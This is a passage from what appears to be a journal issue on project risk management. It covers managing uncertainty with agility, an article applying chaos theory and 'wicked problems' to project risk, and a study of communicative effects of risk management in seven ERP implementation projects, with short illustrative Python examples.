If only we could find them, we could dispose of them and
our project would be free of uncertainty.
This is a flawed point of view. Uncertainty attaches to
every action or decision much like smell or colour does to
a flower. The level of uncertainty may be strong or weak
but collectively we can never completely eliminate uncertainty because the only project with no uncertainty is the
project that does nothing.
Once this is accepted, it becomes pointless to attempt to
manage uncertainty in isolation from everything else. A
project manager cannot set aside a certain number of hours
each week to manage uncertainty; it is inherent in every
decision taken. Uncertainty cannot be compartmentalised.
It lurks in all project tasks, in their dependencies and underlying assumptions.
Alertness to any deviation from the norm is vital. A culture of collective problem ownership and responsibility is
also important. All team members need to be capable of
resolving issues within their domain as soon as they are
spotted. The period between a trigger event and a full-blown
crisis is often small, so there may not always be time to
refer up the management chain and await a decision. The
ability to act decisively – often on individual initiative –
needs to be instilled in the team and backed up by clear
lines of responsibility and powers of delegation. In time,
this should become part of the day job for members of the
team at all levels.

Figure 5: Collective Team Responsibility to react rapidly during the Transition Period is Key to minimising the Impact of Uncertainty.
Project tolerances can sometimes mask emerging uncertainty. Thresholds need to be set low enough so that issues are picked up early in the uncertainty lifecycle, giving
more time to react effectively. It also depends on the nature
of the metrics being used to track progress, for example:
number of defects appearing at the prototyping stage, individual productivity measures, number of client issues
flagged, etc. Choose the metrics carefully. The most obvious metrics will not necessarily give the clearest picture (or
the earliest warning) of emerging problems.
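As a purely illustrative sketch (the metric names and trigger levels below are invented for the example), a weekly check might compare a handful of tracked measures against deliberately low thresholds so that emerging problems surface early in the uncertainty lifecycle:

# Hypothetical early-warning thresholds; metric names and values are illustrative only.
THRESHOLDS = {
    "prototype_defects_per_week": 12,   # warn when weekly defects exceed this
    "open_client_issues": 8,            # warn when open issues exceed this
    "productivity_vs_plan_pct": 85,     # warn when productivity falls below this
}

def early_warnings(metrics: dict[str, float]) -> list[str]:
    """Compare tracked metrics against low trigger levels and report breaches."""
    warnings = []
    for name, value in metrics.items():
        limit = THRESHOLDS.get(name)
        if limit is None:
            continue
        # Percentage-of-plan measures breach when they fall below the limit;
        # count-style measures breach when they rise above it.
        breached = value < limit if name.endswith("_pct") else value > limit
        if breached:
            warnings.append(f"{name} = {value} breaches trigger level {limit}")
    return warnings

this_week = {"prototype_defects_per_week": 15,
             "open_client_issues": 5,
             "productivity_vs_plan_pct": 78}

for warning in early_warnings(this_week):
    print(warning)

Setting the trigger levels is itself a judgement about risk appetite: set them too high and the early part of the uncertainty lifecycle is lost; set them too low and the team chases noise.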
3.3 Put Effective Decision-making at the Heart of
Managing Uncertainty
When faced with uncertainty, the project manager has
several options available (see Figure 6). The project manager must decide how to act – either by suppressing uncertainty (perhaps through plugging knowledge gaps), or adapting to it by drawing up mitigation plans, or detouring around
it and finding an alternative path to the project’s goals.
Whichever action is taken, the quality of decision-making determines a project’s survival in the face of uncertainty
and is influenced by everything from individual experience
and line management structures to the establishment of a blame-free culture which encourages those put on the spot to act
in the project’s best interests with confidence. As the old
adage says: Decisions without actions are pointless. Actions without decisions are reckless.

Figure 6: Four Possible Modes for confronting Major Uncertainty.
The most commonly used tactic against major uncertainty is to suppress it, reducing the magnitude of the uncertainty and hence the threat it represents. If this can be done
pre-emptively by reducing the source of the uncertainty,
the greatest benefits will be achieved. Avoiding uncertainty
by suppressing it sounds like a safe bet – and it is, providing it can be done cost-effectively. As the first tenet states,
reduction is the goal, not elimination. For novel or highly
complex projects, particularly those with many co-dependencies, it may be too difficult or costly to suppress all possible areas of uncertainty.
By adapting to uncertainty, the project tolerates a working level of uncertainty but is prepared to act swiftly to
limit the most damaging aspects of any unexpected events.
This is a highly pragmatic approach. It requires agile and
flexible management processes which can firstly detect
emerging issues in their infancy and secondly, deal with
them swiftly and decisively. For example, imagine a yacht
sailing in strong winds. The helmsman cannot predict the
strength of sudden gusts or the direction in which the boat
will be deflected, but by making frequent and rapid tiller
adjustments, the boat continues to travel in an approximately
straight line towards its destination.
Given the choice, we should like to detour around all
areas of uncertainty. Avoiding the source of uncertainty
means that the consequences (that is, the unexpected outcomes) are no longer relevant to the project. Thus there is
no need to take costly precautions to resolve unknowns or
deal with their repercussions. Unfortunately, detouring
around uncertainty is hard to achieve, for two reasons.
Firstly, many sources of uncertainty are simply unavoidable, or the avoidance measures are too costly. Consider
the example of a subcontractor who, it later transpires, may
be incapable of delivering a critical input on time. We could
detour around this uncertainty by dismissing the subcontractor in favour of some competitor who can provide a better service. This will mean cancelling existing contracts,
researching the marketplace and renegotiating commercial
terms with an alternative supplier – all time-consuming and
potentially costly activities – and with the risk of being no
better off with the alternative supplier.
Secondly, detouring only works for quantifiable uncertainty (the ‘known unknowns’). Unfathomable uncertainty
may well strike too rapidly to permit a detour.
Our final option is reorientation. This is a more dramatic form of detour where we aim for a modified set of
objectives in the face of insurmountable uncertainty. Highly
novel projects sometimes have to do this. To plough on in
the face of extreme uncertainty risks total failure. The only
alternative is to redefine the goals, that is, reorient the project
in a way that negates the worst of the uncertainty. This is not a
tactic for the faint-hearted. Convincing the client that a project
cannot be delivered as originally conceived is no easy task.
But it is worth asking the question, "Is it better to deliver something different (but broadly equivalent) than nothing at all?"
3.4 Uncertainty encompasses both Opportunity
and Threat
It is important to seize opportunities when they arise. If
some aspects of a project are uncertain, it means there are
still choices to be made, so we must choose well. Too often,
the negative consequences dominate the discussion, but
perhaps the project can achieve more than was planned, or
achieve the same thing by taking a different path. Is there a
chance to be innovative? Project managers must always be
open to creative solutions. As Einstein said, "We can’t solve
problems by using the same kind of thinking we used when
we created them."
All approaches to dealing with uncertainty depend to a
greater or lesser extent on being able to forecast future
events. The classic approach is sequential: extrapolating
from one logical situation to the next, extending out to some
point in the future. But with each step, cumulative errors
build up until we are no longer forecasting but merely enumerating the possibilities.
Suppose instead we don’t try to forecast what will happen, but focus on what we want to happen? This means
visualising a desired outcome and examining which attributes of that scenario are most valuable. Working backwards from this point, it becomes possible to see what circumstances will naturally lead to this scenario. Take another step back, and we see what precursors need to be in
place to lead to the penultimate step – and so on until we
have stepped back far enough to be within touching distance of the current project status. (See Figure 7).

Figure 7: Making an Intuitive Leap to visualise a Future Scenario.
This approach focuses on positive attributes (what are
the project’s success criteria?) not the negative aspects of
the risks to be avoided. Both are important, but many project
managers forget to pay sufficient attention to nurturing the
positive aspects. By ‘thinking backwards’ from a future scenario, the desired path often becomes much clearer. It is
ironic that ‘backward thinking’ is often just what is needed
to lead a project forward to successful completion.
3.5 Meet Uncertainty with Agility
Perhaps the best defence against uncertainty is to organise and structure a project in a sufficiently agile fashion
to be resilient to the problems that uncertainty inevitably
brings. This manifests in two ways: how fast can the project
adapt and cope with the unexpected, and how flexible is
the project in identifying either new objectives or new ways
to achieve the same goals?
One approach is to ensure that the project only ever takes
small steps. Small steps are easier to conceptualise, plan
for and manage. They can be retraced more easily if they
haven’t delivered the required results or if it becomes clear
they are leading in the wrong direction. Small steps also
support the idea of fast learning loops. For instance, a
lengthy project phase reduces the opportunity to feed back
lessons learned quickly. If the project is too slow to respond, it may fail under the accumulated weight of uncertainty.
More iterative ways of working are becoming increasingly common and do much to increase the agility of a
project. A feature of monolithic projects (i.e. those which
do not follow an iterative strategy) is the assumption that
everything proceeds more or less as a sequence of tasks
executed on a ‘right first time’ basis. Generally speaking,
more effort is directed at protecting this assumption (for
example, by analysing and mitigating risks which may
threaten the task sequence) than on planning for a certain
level of rework. In contrast, by planning to tackle tasks iteratively, two benefits are gained: firstly, early sight of unfathomable issues which wouldn’t otherwise surface until
much later in the schedule, and secondly, greater opportunity to make controlled changes.
Finally, an agile project is continuously looking for ways
to improve. A project which is unable (or unwilling) to learn
lessons is destined to repeat its early mistakes because it
ignores opportunities to learn from the unexpected. Some
lessons are obvious, some require much soul-searching,
brainstorming or independent analysis. What matters above
all else is that the improvements are captured and disseminated and the changes implemented, either in the latter project
stages or in the next project the organisation undertakes.
The application of the ‘New Sciences’
to Risk and Project Management1
David Hancock
The types of problems that need to be solved in organizations vary greatly in complexity, ranging from ‘tame’ problems to ‘wicked messes’. We argue that projects tend to have the characteristics of wicked messes, where decision making gets confused by behavioural and dynamic complexities which coexist and interact. To address the situation
we cannot continue to rely on sequential resolution processes, quantitative assessments and simple qualitative estimates.
We propose instead to develop the concept of risk leadership which is intended to capture the activities and knowledge
necessary for project managers to accommodate the disorder and unpredictability inherent in project environments through
flexible practices leading to negotiated solutions.
Keywords: Behavioural Complexities, Chaotic Systems, Dynamic Complexities, Quantitative Assessments,
Qualitative Estimates, Risk Leadership, Risk Management,
Scientific Management, Tame Problems, Wicked Problems.
"We’re better at predicting events at the edge of the galaxy or inside the nucleus of an atom than whether it’ll rain
on auntie’s garden party three Sundays from now. Because
the problem turns out to be different. We can’t even predict
the next drip from a dripping tap when it gets irregular. It’s
the best possible time to be alive, when almost everything
you thought you knew is wrong."
"Arcadia" by Tom Stoppard
Introduction
There is a feeling amongst some risk practitioners, myself included, that theoretical risk management has strayed
from our intuition of the world of project management. Historically, project risk management has developed from the
numerical disciplines dominated by a preoccupation with
statistics (insurance, accountancy, engineering, etc.). This has
led to a bias towards the numerical in the world of project
management.
1 This article was previously published online in the "Advances in Project Management" column of PM World Today (Vol. XII, Issue V, May 2010), <http://www.pmworldtoday.net/>. It is republished with all permissions.

Author

David Hancock is Head of Project Risk for London Underground, part of Transport for London, United Kingdom. He has run his own consultancy, and was Director of Risk and Assurance for the London Development Agency (LDA) under the leadership of both Ken Livingstone and Boris Johnson, with responsibility for risk management activities including health & safety, business continuity and audit for all of the Agency’s and its partners’ programmes. Prior to this role, for 6 years he was Executive Resources Director with the Halcrow Group, responsible for establishing and expanding the business consultancy group. He has a wide breadth of knowledge in project management and complex projects and extensive experience in opportunity & risk management, with special regard to the people & behavioural aspects. He is presently a board director with ALARM (The National Forum for Risk Management in the Public Sector), a co-director of the Managing Partners’ Forum risk panel, a member of the programme committee for the Major Projects Association and a Visiting Fellow at Cranfield University, United Kingdom, in their School of Management. <[email protected]>

In the 1950s a new type of scientific management was emerging, that of project management. This consisted of the development of formal tools and techniques to help manage large, complex projects that were considered uncertain or risky. It was dominated by the construction and engineering industries, with companies such as Du Pont developing Critical Path Analysis (CPA) and RAND Corp developing the Programme Evaluation and Review Technique (PERT). Following on the heels of these early project management techniques, institutions began to be formed in the 1970s as repositories for these developing
methodologies. In 1969 the American Project Management
Institute (PMI) was founded; in 2009 the organization had more than 420,000 members, with 250 chapters in more
than 171 countries. It was followed in 1975 by the UK Association of Project Managers (changed to Association for
Project Management in 1999) with its own set of methodologies. In order to explicitly capture and codify the processes by which they believed projects should be managed,
they developed qualifications and guidelines to support
them. However, whilst the worlds of physics, mathematics, economics and science have moved on beyond Newtonian methods to a more behavioural understanding (the so-called new sciences, led by eminent scholars in the field such as Einstein, Lorenz and Feynman), project and risk management appears largely to have remained stuck in the principles of the 1950s.
Box 1: The Butterfly Effect
In 1961, whilst working on long-range weather prediction, Edward Lorenz made a startling discovery. On one particular weather run, rather than starting the second run from the beginning, he started it part way through using the figures from the first run. This should have produced an identical run, but he found that it started to diverge rapidly until, after a few months, it bore no resemblance to the first run. At first he thought he had entered the numbers in error. However, this turned out to be far from the case: what he had actually done was round the figures, using only three decimal places instead of the six produced as output (.506 instead of .506127). The difference, one part in a thousand, he had considered inconsequential, especially as a weather satellite able to read to this level of accuracy would be considered quite unusual. Yet this slight difference caused a massive difference in the resulting end point. This gave rise to the idea that a butterfly could produce small, undetectable changes in pressure which, if included in the model, could alter the path of a tornado, or delay or stop it, over time.
Edward N. Lorenz. Predictability: Does the Flap of a Butterfly's Wings in Brazil Set Off a Tornado in Texas? 1972.
Figure: Two pendulums with an initial starting difference of only 1 arcsec (1/3600 of a
degree).
Table 1: The implications of the New Concept of Risk Leadership.
The general perception amongst most project and risk
managers that we can somehow control the future is, in my
opinion, one of the most ill-conceived notions in risk management.
However, we have made at least two advances in the right
direction. Firstly, we now have a better understanding about
the likelihood of unpleasant surprises and, more importantly,
we are learning how to recognise their occurrence early on
and subsequently to manage the consequences when they
do occur.
Qualitative and Quantitative Risk
The biggest problem facing us is how to measure all
these risks in terms of their potential likelihood, their possible consequences, their correlation and the public’s perception of them. Most organisations measure different risks
using different tools. They use engineering estimates for
property exposures, leading to MFLs (maximum foreseeable loss) and PMLs (probable maximum loss). Actuarial
projections are employed for expected loss levels where
sufficient loss data is available. Scenario analyses and
Monte Carlo simulations are used when data is thin, especially to answer ‘how much should I apply?’ questions.
Probabilistic and quantitative risk assessments are used for
toxicity estimates for drugs and chemicals, and to support
public policy decisions. For political risks, managers rely
on qualitative analyses of ‘experts’. When it comes to financial risks (credit, currency, interest rate and market), we
are inundated with Greek letters (betas, thetas, and so on)
and complex econometric models that are comprehensible
only to the trained and initiated. The quantitative tools are
often too abstract for laymen, whereas the qualitative tools lack
mathematical rigour. Organisations need a combination of both
tools, so that they can deliver sensible and practical assessments of their risks to their stakeholders. Finally it is important
to remember that the result of quantitative risk assessment development should be continuously checked against one’s own
intuition about what constitutes reasonable qualitative behaviour. When such a check reveals disagreement, then the following possibilities must be considered:
1. A mistake has been made in the formal mathematical development;
2. The starting assumptions are incorrect and/or constitute too drastic an oversimplification;
3. One’s own intuition about the field is inadequately
developed;
4. A penetrating new principle has been discovered.
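To make the role of the Monte Carlo simulations mentioned above concrete, the following minimal Python sketch estimates an expected annual loss and a ‘probable maximum loss’-style quantile from an assumed frequency/severity model; the distributions and parameters are purely hypothetical and merely stand in for whatever thin data an organisation actually has.

```python
import numpy as np

rng = np.random.default_rng(42)

# Hypothetical assumptions: number of loss events per year ~ Poisson(2),
# severity of each loss ~ lognormal with a median of 50,000 and a heavy tail.
n_sims = 100_000
annual_losses = np.empty(n_sims)

for i in range(n_sims):
    n_events = rng.poisson(lam=2.0)
    severities = rng.lognormal(mean=np.log(50_000), sigma=1.2, size=n_events)
    annual_losses[i] = severities.sum()

print(f"Expected annual loss:   {annual_losses.mean():,.0f}")
print(f"95th percentile loss:   {np.percentile(annual_losses, 95):,.0f}")
print(f"99.5th percentile loss: {np.percentile(annual_losses, 99.5):,.0f}")
```

Quantiles of the simulated loss distribution play the same role as the MFL and PML figures obtained from engineering estimates, and can be checked against intuition in exactly the way described above.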
Tame Messes and Wicked Problems
One of the first areas to be investigated is whether our current single classification of projects is a correct assumption.
The general view at present appears to treat them as linear,
deterministic predictable systems, where a complex system or
problem can be reduced into simple forms for the purpose of
analysis. It is then believed that the analysis of those individual
parts will give an accurate insight into the working of the whole system, together with the strongly held feeling that science will explain everything. The use of Gantt charts with their critical paths, and of quantitative risk models with their corresponding risk correlations, would support this view. However, this type of problem, which can be termed tame, appears to be only part of the story when it comes to defining our projects.
Tame problems have straightforward, simple, linear causal relationships and can be solved by analytical methods, sometimes called the cascade or
waterfall method. Here lessons can be learnt from past
events and behaviours and applied to future problems, so
that best practices and procedures can be identified. In contrast ‘messes’ have high levels of system complexity and
are clusters of interrelated or interdependent problems. Here
the elements of the system are normally simple, where the
complexity lies in the nature of the interaction of its elements. Their principal characteristic is that they cannot be solved in isolation but need to be considered holistically.
Here the solutions lie in the realm of systems thinking. Project
management has introduced the concepts of Programme and
Portfolio management to attempt to deal with this type of complexity and address the issues of interdependencies. Using strategies for dealing with messes is fine as long as most of us
share an overriding social theory or social ethic; if we don’t
we face ‘wickedness’. Wicked problems are termed ‘divergent’, as opposed to ‘convergent’, problems. Wicked
problems are characterised by high levels of behavioural
complexity. What confuses real decision-making is that behavioural and dynamic complexities co-exist and interact
in what we call wicked messes. Dynamic complexity requires high level conceptual and systems thinking skills;
behavioural complexity requires high levels of relationship
and facilitative skills. The fact that problems cannot be
solved in isolation from one another makes it even more
difficult to deal with people’s differing assumptions and
values; people who think differently must learn about and
create a common reality, one which none of them initially
understands adequately. The main thrust of the resolution of these types of problems is stakeholder participation and ‘satisficing’. Many risk planning and forecasting exercises
are still being undertaken on the basis of tame problems
that assume the variables on which they are based are few,
that they are fully understood and able to be controlled.
However, uncertainties in the economy, politics and society have become so great as to render this kind of risk management, which many projects and organisations still practise, counterproductive, if not futile.
Chaos and Projects
At best, I believe projects should be considered as deterministic chaotic systems rather than tame problems. Here I am not using the term ‘chaos’ in its everyday English sense, which tends to be associated with absolute randomness and anarchy (the Oxford English Dictionary describes chaos as "complete disorder and confusion"), but in the sense of the chaos theory developed in the 1960s. This theory showed that, in systems which have a degree of feedback incorporated in them, tiny differences in input can produce overwhelming differences in output (the so-called Butterfly Effect; see Box 1 [1]). Here chaos is defined as aperiodic (never repeating twice) banded dynamics (a finite range) of a deterministic system (definite rules) that is sensitive to initial conditions. This appears to describe projects much better than the linear, deterministic and predictable view, since both randomness and order can exist simultaneously within such systems. These types of problem are not held in equilibrium, either amongst their parts or with their environment; they are far from equilibrium, and the system operates ‘at the edge of chaos’, where small changes in input can cause the project either to settle into a pattern or just as easily to veer into total discord. For those who are sceptical, consider a failing project that receives new leadership: it can just as easily move into abject failure as settle into successful delivery, and at the outset we cannot predict with any certainty which one will prevail. At worst, projects are wicked messes.
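A minimal numerical sketch of this sensitivity to initial conditions, in the spirit of Lorenz's rounding experiment in Box 1: the logistic map (used here instead of a weather model purely for brevity) is iterated from two starting values that differ only from the fourth decimal place onwards, and the two trajectories soon bear no resemblance to each other.

```python
# Logistic map in its chaotic regime (r = 4): x_{n+1} = r * x_n * (1 - x_n).
# Start from a 'full precision' value and from the same value rounded to
# three decimal places, echoing Lorenz's .506127 vs .506.
r = 4.0
x_full, x_rounded = 0.506127, 0.506

for step in range(1, 61):
    x_full = r * x_full * (1.0 - x_full)
    x_rounded = r * x_rounded * (1.0 - x_rounded)
    if step % 10 == 0:
        print(f"step {step:2d}: {x_full:.6f} vs {x_rounded:.6f} "
              f"(difference {abs(x_full - x_rounded):.6f})")
```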
Conclusion
How should the project and risk professional exist in this world of future uncertainty? Not by returning to a reliance on quantitative assessments and statistics where none exists. We need to embrace its complexities and understand the type of problem we face before deploying our armoury of tools and techniques to uncover a solution, be they the application of quantitative data or qualitative estimates. To address risk in the future tense we need to develop the concept of ‘risk leadership’, which consists of:
• Guiding rather than prescribing
• Adapting rather than formalising
• Learning to live with complexity rather than simplifying
• Inclusion rather than exclusion
• Leading rather than managing
The implications of the new concept of risk leadership are described in Table 1.
What does this all mean? At the least it means that we must apply a new approach to project and risk management for problems which are not tame; that we should look to enhance our understanding of the behavioural aspects of the profession and move away from a blind application of process and generic standards towards an informed implementation of guidance; and that project and risk management is more of an art than a science, and that this truly is the best time to be alive and to be in project and risk management.

References
[1] J. Gleick. Chaos: Making a New Science. Penguin, 1987.
Communicative Project Risk Management in IT Projects
Karel de Bakker
Project management practitioners and scientists assume that risk management contributes to project success through
better planning of time, money and requirements. However, current literature on the relation between risk management
and IT project success provides hardly any evidence for this assumption. Nevertheless, risk management is used frequently
on IT projects. Findings from new research provide evidence that individual risk management activities are able to contribute to project success through "communicative effects": risk management triggers or stimulates action taking, it influences and synchronizes stakeholders’ perceptions and expectations, and it shapes inter-stakeholder relationships.
These effects contribute to the success of the project.
Keywords: Case Studies, Communicative Action, ERP,
Experiment, Project Risk Management, Project Success.
1 Introduction
The question as to whether project risk management
contributes to project success is, in the context of project
management practitioners, essentially a question about the
value of an instrument: an instrument that is employed by project managers during the planning and execution stages of a project to secure project success, regardless of all manner of unexpected events and situations that may occur during project execution.
In order to answer the question, a research project [1]
was conducted which was divided into four stages. The structure of this article embodies this staged approach, the first
stage being a study of recent literature on the relationship
between risk management and Information Technology (IT)
project success. IT projects were chosen because they are well known for their frequent failure (see e.g. [2]), and because of the recommendation to use risk management more frequently in order to increase the success rate [3].
From the literature study it appeared that in order to answer the question about the contribution of project risk management to IT project success, an additional view on project
risk management and project success is necessary. This additional view is developed in the second stage of the research. Exploration of the additional view is done in the
third stage, by means of case studies of ERP implementation projects. Finally, in stage four, an experiment is conducted in which the influence of a single risk management
activity on project success is investigated. This article concludes with a section on theoretical implications and implications for practitioners.
Author

Karel de Bakker is a Senior Consultant for Het Expertise Centrum, The Netherlands. He received his PhD from the University of Groningen, The Netherlands (2011), and his Master’s degree from the University of Enschede, The Netherlands (1989). He has been a PMI certified project manager (PMP) since 2004. His assignments brought him into contact with various organisations, including ABN AMRO Bank, ING Bank, KLPD (Netherlands Police Agency), KPN Telecom, and NS (Dutch Railways). Over the years, risk management became an important element in his assignments. His scientific work on the relation between risk management and project success was published in the International Journal of Project Management, Project Management Journal and International Journal of Project Organisation and Management. <[email protected]>

2 What does Literature tell us about Risk Management and IT Project Success?
The literature study investigated 29 papers, published between 1997 and 2009 in scientific journals, reporting on the relationship between risk management and project success in IT projects. The study demonstrates two main approaches to how risk management is defined in the literature, one of them being the management approach.
The management approach considers risk management as
being an example of a rational problem solving process in
which risks are identified, analysed, and responses are developed and implemented. Evidence found in all investigated papers for the relationship between risk management
and project success is primarily anecdotal or not presented
at all.
Additional empirical findings indicate that the assumptions underpinning the management approach to risk management are often invalid. Firstly, IT projects contain risks
for which there is no classical or statistical probability distribution available. These risks cannot be managed by means
of the risk management process [4]. Secondly, project managers in IT projects show a tendency to deny the actual
presence of risk; they avoid it, ignore it or delay their actions [5]. This behaviour is not in line with the assumed rational behaviour of actors. Thirdly, project stakeholders in general deliberately overestimate the benefits of the project and at the same time underestimate the project risks at the start of the project [6]. Finally, various authors (e.g. [7]) indicate that the complete sequence of risk management activities is often not followed in projects; consequently, the assumption of rational problem solving is incorrect.

Figure 1: Traditional View on Risk Management and its Relation to the Project. (Diagram: risk management, as instrumental action, influences the project, an instrumental object, through an instrumental effect.)
Not only is there very little evidence in recent literature that risk management contributes to IT project success; empirical findings thus far also indicate that it is unlikely that risk management is able to contribute to IT project success.
Taking into consideration the remarks made by various authors about the limitations of IT projects, risk management
is able to contribute to IT project success if the project: (1)
has clear and fixed requirements, (2) uses a strict method of
system development, and (3) has historical and applicable
data available, collected from previous projects. The combination of the three mentioned criteria will only occasionally be met in IT projects. As an example we can consider
the development of a software module of known functionality and function points by a software development organisation, certified on CMM level 4 or 5.
It remains remarkable that there is such a large gap between project risk management in theory and project risk
management in practice. Findings from research indicate
that the complete risk management process as described for
instance in the PMI Body of Knowledge [8], is often not
followed [9], or even that practitioners do not see the value
of executing particular steps of the risk management process [7]. In addition, it is remarkable that both project management Bodies of Knowledge and established current literature ignore the results from research which indicate that the
assumptions and mechanisms that underpin project risk
management only work in specific situations, or do not work
at all. This should at least lead to a discussion about the
validity of certain elements of the Bodies of Knowledge,
and to the adjustment of the project risk management process, which is claimed to be founded on good practice [8] or
even Best Practice [10].
3 An Additional View on Project Risk Management
An important assumption in the current literature underpinning both project management and the way risk management influences the project and consequently project
success, is the assumption that projects are taking place in a
reality that is known, and that reality is responding according to the laws of nature the project stakeholders either know
or may be able to know (see e.g. [11]). This so called
instrumentalism assumption defines project risk management, its effects, and the object on which project risk management works, i.e. the project, in instrumental terms. Figure 1 depicts the relation between risk management and the
project in traditional terms, in other words under the assumption of instrumentalism.
Risk management may work well in situations in which
the object of risk management can be described in terms of
predictable behaviour (the instrumental context), for instance
controlling an airplane or a nuclear power plant, or a piece
of well defined software that must be created as part of an
IT project. Risk management is then an analytical process
in which information is collected and analysed on events
that may negatively influence the behaviour of the object
of risk management. However, projects, and particularly IT
projects, generally consist of a combination of elements that
contain both predictable and human behaviour; the latter of
which is not always predictable. The presence of human behaviour makes a project a social object, an object which does not behave completely predictably.

Figure 2: Adjusted (or New) View on Risk Management and its Relation to the Project. (Diagram: risk management, as social action, influences the project, a social object, through instrumental and additional effects.)

Figure 3: Communicative and Instrumental Effects of Risk Management on Project Success. (Diagram: risk management activities, e.g. identification, registration, analysis, allocation and reporting, produce communicative and instrumental effects on the success of the project, an individual stakeholder opinion.)
Furthermore, human behaviour, together with human
interaction, plays a role in the risk management process itself. During the various activities of the risk management
process, participants in these activities interact with each
other. Risk management can then no longer be considered
instrumental action, but should be considered social action
instead. These interactions between participants in the risk
management process may be able to create effects in addition to the assumed instrumental effects of risk management.
Figure 2 presents this adjusted view on the relationship between risk management and the project.
This adjusted view, which considers risk management
as being social action working on a social object, instead of
instrumental action working on an instrumental object, leads
to various changes in model definitions and assumptions
compared to the traditional view.
The adjusted view considers project success to be the
result of a personal evaluation of project outcome characteristics by each stakeholder individually (see e.g. [12]).
Timely delivery, delivery within budget limits and delivery
according to requirements, being the traditional objective
project success criteria, may play an important role in this
stakeholder evaluation process, but they are no longer the
only outcomes that together determine if the project can be
considered a success. Therefore, project success becomes
opinionated project success, and is no longer considered as
something that can be determined and measured only in
objective terms.
The adjusted view, considering risk management in
terms of social action, implies that risk management is a
process in which participants interact with each other. In
addition to the traditional view, which considers risk management only in terms of instrumental action and instrumental effects, the additional view assumes that interaction
between participants or social interaction exists, which may
lead to additional effects on the project and its success (see
Figure 3). This research refers to these effects resulting from
interaction as “communicative effects”, and the research
assumes that each risk management activity individually
may be able to generate communicative effects and may
therefore individually contribute to project success.
Generally speaking, this additional view on risk management creates an environment in which human behaviour and perception play central roles in terms of describing the effect of risk management and the success of the project.
Case 1
Sector: Food industry
Project description: SAP system implemented on two geographic locations in four organisational units. System used to support a number of different food production processes and financial activities.
Duration: 13 months
Additional information: Use of method for organisational change, not for project management. Time & material project contract. External project manager, hired by the customer, and not related to the IT supplier.

Case 2
Sector: Government
Project description: SAP system implemented on 40 locations. System used for production, issuing and administration of personalized cards that provide access to office buildings. SAP linked on all 40 locations to peripheral equipment (photo equipment, card printers).
Duration: 17 months
Additional information: Internal project with internal project manager. Limited number of external personnel. No formal project contract. Limited Prince2 methodological approach, combined with organization-specific procedures and templates.

Case 3
Sector: Government
Project description: SAP system implemented on four locations. System used for scheduling duty rosters of around 3000 employees. Time-critical project because of expiring licences of the previous scheduling system.
Duration: 24 months (including feasibility study), 21 months excluding it
Additional information: Internal project with internal project manager. Limited number of external personnel. No formal project contract. Limited Prince2 methodological approach, combined with organization-specific procedures and templates.

Case 4
Sector: Energy
Project description: Creation from scratch of a new company, being part of a larger company. SAP designed and implemented to support all business processes of the new company. SAP system with high level of customization.
Duration: 9 months (for stage 1; time according to original plan, but with scope limited)
Additional information: The ERP project was part of a much larger project. Fixed-price, fixed-time, fixed-scope contract with financial incentives. Project manager from IT supplier. Project restarted and re-scoped after failure of first attempt. Strict use of (internal) project management methodology, procedures and templates.

Case 5
Sector: Public utility (social housing)
Project description: ERP system based on Microsoft Dynamics Navision. Implemented to support various primary business processes, for instance: customer contact, contract administration, property maintenance.
Duration: 12 months
Additional information: Time and material contract. Project restart after failure of first attempt. Project manager from IT supplier organization. Limited Prince2 methodological approach.

Table 1A: Overview of Seven investigated ERP Implementation Projects (Cases 1-5).

Case 6
Sector: Public utility (social housing)
Project description: ERP system based on Microsoft Dynamics Navision. Implemented to support various primary business processes, for instance: customer contact, contract administration,
Duration: 11 months
Additional information: Time and material contract. External project manager, hired by the customer organization and with no formal relation to the IT supplier. No formal project management methodology used.

Case 7
Sector: Petro-chemical industry
Project description: Divestment project. Selling all activities of one specific country to a new owner. Existing ERP systems related to the sold activities carved out of the company-wide ERP system (mainly SAP) and handed over to the new owner.
Duration: 14 months (ready for hand-over as planned)
Additional information: The ERP project was part of a larger project. The ERP project budget was low (less than 5%) compared to the overall deal (approx. 400 million EUR). Internal project manager. Fixed-time project, but delayed several times because of external factors. Internal project management guidelines and templates used.

Table 1B: Overview of Seven investigated ERP Implementation Projects (Cases 6-7).
The additional view acknowledges the influence of
stakeholders interacting with each other, and influencing
each other through communication. By doing so, this additional view positions itself outside the strict instrumental or
“traditional” project management approach that can be found
in project management Bodies of Knowledge. However, the
additional view does not deny the fact that risk management may influence project success in an instrumental
way; it only states that in addition to the potential instrumental effect of risk management, there is a communicative effect. Given the limitations of the effectiveness of
the instrumental effect, the influence of the communicative effect of risk management on project success may well be larger than the influence of the instrumental effect.
4 Results from Case Studies
Seven ERP implementation projects were investigated
for the presence of communicative effects as a result of the
project risk management process. Table 1 presents an overview of all investigated ERP implementation projects. A total of 19 stakeholders from the various projects were interviewed. Data collection took place
between one and two months after project completion.
Considering project success, two projects score low on
objective project success because of serious issues with
time, budget and requirements; both projects had a restart.
Four projects score medium on objective project success,
all having minor issues with one or more of the objective
success criteria. One project scores high on objective project
success. Variation on opinionated project success is low.
Stakeholders from the two low objective success projects
score lower on opinionated project success than
stakeholders from the other five projects, but based on the
objective success scores, the difference is less than expected.
ERP implementation projects that participated in the research were selected based on the criterion that they had
done “something” on risk management. The sample of
projects therefore does not include projects that performed
no risk management at all. Risk identification is conducted
on all projects, in various formats including brainstorm sessions, moderated sessions and expert sessions. Risk analysis was carried out in five projects, but only in a rather basic way; none of the projects used techniques for quantitative risk analysis. Other risk management activities, the use
of which was investigated in the projects, are: the planning of the risk management process, the registration of risks, the allocation of risks to groups or individuals, the reporting of risks to stakeholders or stakeholder groups, and the control of risks. Actual use and format of these practices vary over the projects.

1 This typology of effects is based on The Theory of Communicative Action by Jürgen Habermas (1984) [13]. In order to avoid an excessively wide scope for this article, this theoretical background is not discussed here.
The case studies’ results demonstrate that, according to
stakeholders, project risk management activities contribute
to the perceived success of the project. Risk identification
is, by all stakeholders, considered to be the risk management activity that contributes most to project success. Furthermore, stakeholders provide a large number of indications on how risk identification, in their view, contributes
to project success. Finally, risk identification is, by
stakeholders, considered to be able to contribute to project
success through a number of different effects: Action, Perception, Expectation and Relation effects1.
Risk identification triggers, initiates or stimulates action taking, or makes actions more effective (Action effect). It influences the perception of an individual
stakeholder and synchronizes various stakeholders’ perceptions (Perception effect). It influences the expectations of
stakeholders towards the final project result or the expectations on stakeholder behaviour during project execution
(Expectation effect). Finally, it contributes to the process of
building and maintaining a work and interpersonal relationship between project stakeholders (Relation effect). Risk
reporting is another risk management activity that influences
project success through these four effects. Other risk management activities also generate effects, but less than the
four effects mentioned with risk identification and reporting. The research data demonstrate a positive relation (both
in quantity and in quality) between the effects generated
through risk management activities and project success.
